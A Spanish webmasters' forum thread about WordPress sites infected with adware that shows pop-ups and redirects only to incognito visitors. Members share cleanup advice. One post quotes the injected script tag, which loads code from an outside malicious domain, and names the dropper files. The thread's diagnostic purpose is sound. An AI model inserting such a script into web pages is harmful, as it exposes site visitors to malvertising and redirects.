web infectada por malware

Club para webmasters Foros Creación de páginas web web infectada por malware

Viendo 10 entradas - de la 1 a la 10 (de un total de 10)
  • Autor
    Entradas
  • #7410 Karma: 0
    Supra
    Participante
    13

    Desde hace un tiempo, he podido observar que en ocasiones, cuando visito algunas de mis webs en modo incógnito, me aparece una publicidad engorrosa, con popups, anuncios de sexo, y mensajes de que mi web, quiere mostrar notificaciones. Por supuesto, estos anuncios no están autorizados, por lo que pienso que puede estar infectadas por algún tipo de malware, de hecho, en securi.net, una de ellas me aparece infectada con malware.
    He hablado con mi hosting, y no detectan nada, pero dicen que no detectan nada extraño.
    Si entro a través del panel de WP, no aparecen, si entro en la búsqueda de google, no aparecen, pero si entro en incógnito aparecen los anuncios ( solo en ocasiones).
    Alguien sabe como solucionarlo? tengo una captura de pantalla, pero no se si puedo subirla para que la veáis.
    Y OJO!!! aconsejo a todos que entren en incógnito a su web por si detectan esta intrusión.
    Un saludo a todos

    SEO Y PASTA

    #7420 Karma: 0
    David Cuesta
    Superadministrador
    178

    Vaya qué putada, yo diría que sí está infectada, no puede mostrar anuncios de ese tipo así sin más.

    Si la web es grande y te reporta mucho dinero, sería bueno pagar a alguien que te la limpie, si la web es pequeña, podrías pasar todo el contenido a otra web y borrar la antigua, así cambias de base de datos y probablemente dejes atrás el virus, también tendrías que usar todo plugins nuevos por si el virus está en archivos.

    Un saludo!g

    #7424 Karma: 0
    Supra
    Participante
    13

    Gracias David por tu respuesta.
    He hablado con mi hosting, y la única solución que me han dado, es desinfectar todas las webs alojadas en mi cuenta de hosting, a razón de 100€ por cada una. Tengo 28 :((((
    Voy a intentar ir limpiándolas una a una, de mas importante a menos, y creo que las alojaré en el chorriServer una vez limpias. Me parece mal, que un hosting con renombre, no prevea estas cosas, con un sistema de protección antimalware.
    Creo que el malware, puede estar alojado en un plugin (elementor pro), ya que todo empezó, cuando lo instale la primera vez en una de mis webs. os iré comentando conforme vaya averiguando.

    SEO Y PASTA

    #7425 Karma: 0
    David Cuesta
    Superadministrador
    178

    No creo que sea por elementor pro aunque pudo entrar a través de este plugin si lo tenías desactualizado.

    Busca más información a ver si alguien tiene el mismo virus y sabe arreglarlo y nos cuentas a ver cómo vas solucionándolo, por el club hay gente que ha tenido problemas y ha pagado para que le limpien las webs, puedes preguntar por el grupo de telegram.

    Un saludo!

    #7426 Karma: 0
    Supra
    Participante
    13

    ok gracias de nuevo. Iré comentando conforme vaya solucionando para que sirva a quien tenga el mismo problema.
    Un saludo

    SEO Y PASTA

    #7491 Karma: 0
    EdoVegas
    Participante
    5

    A mi me paso lo mismo por plugins no actualizados hay que tener cuidado con eso

    #7492 Karma: 0
    Supra
    Participante
    13

    Así es EdoVegas, creo que ha podido entrar por elementor . Estoy en ello intentando buscar yo mismo la infección. El problema es que tengo todas las webs en el mismo paquete de hosting, y creo que están infectadas todas.
    Si doy con la forma de localizar la infección y como limpiarlas, lo contaré aquí para ayudar a otros. 100€ por web desinfectada bien vale la pena intentarlo uno mismo.

    SEO Y PASTA

    #7532 Karma: 0
    Supra
    Participante
    13

    ACTUALIZACIÓN:
    OS ESCRIBO ÉSTE PARRAFÓN, PORQUE CREO QUE ES IMPORTANTE PARA LOS WEBSMASTERS.
    Creo que he localizado el archivo que produce la infección. está en ésta ruta del file manager : wp-content/plugins/monit.php
    El script es éste: <script type=»text/javascript» src=»//ofgogoatan.com/apu.php?zoneid=3280383
    El avast, me bloqueaba al intentar acceder a la web porque detectaba riskware y troyano.
    La web, mostraba dos popup de anuncios en la esquina superior derecha, y un mensaje solicitando permisos. Además, al pinchar en alguna pagina interna de la web, redirigía a otra web, en este caso ofgogoatan.com
    En otro apartado del foro, abrí un hilo porque había notado una bajada abismal en mis visitas y ventas de Amazon con algunas webs que tengo de afiliación, y creo que está directamente relacionado con este problema.
    El principal inconveniente, es que es casi indetectable para el webmaster,ya que no aparecen los popups ni al entrar en wordpress como admin, ni al acceder desde nuestro navegador. Solo aparece si entras en modo incógnito, y no siempre.
    Me he percatado también, que si intento acceder desde un enlace de facebook, los popups aparecen siempre, imagino que porque no detecta mi ip sino la de facebook, y no necesita «esconderse».
    Existe un problema añadido, y es que si tienes varias webs alojadas en un mismo hosting, la infección se extenderá a todas las webs, como ha sido mi caso.
    En mi proveedor de hosting, en este caso RAIOLA, no detectaban nada extraño a pesar de haberlo escaneado, lo que quiere decir, que también se oculta de los escudos que pueda tener tu servidor.
    Estoy terminando de analizar la primera web para comprobar que ya esté limpia. Seguiré informando de los avances.

    SEO Y PASTA

    #7536 Karma: 0
    David Cuesta
    Superadministrador
    178

    Parece funcionar como un script de anuncio, puedes buscar esa url o parte del código en la base de datos a ver dónde está escrito, muchas veces están en varios archivos para replicarse si lo borras.

    Un saludo!

    #7558 Karma: 0
    Supra
    Participante
    13

    David, el código no aparece en la base de datos, creo que es la aplicación la que lo crea, ya que he podido darme cuenta, que en ocasiones, redirige a urls diferentes.
    Bueno efectivamente como pensaba, todas las webs están infectadas con el archivo monit.php .
    He localizado en la base de datos, otra carpeta que no se si la ha creado el virus, o debe estar ahí por la propia instalación. se llama » trash » y contiene:
    la aplicacion monit.php
    la aplicacion ads_tm (1).php
    y otro archivo text/x-generic llamado .trash_restore
    Tengo la intuición que son los archivos necesarios, para replicar el virus, aunque sea borrado, e ir infectando todas las webs alojadas en el servidor.
    Voy a empezar a limpiar manualmente, eliminando todos los archivos que he localizado.

    SEO Y PASTA

Viendo 10 entradas - de la 1 a la 10 (de un total de 10)
  • Debes estar registrado para responder a este debate.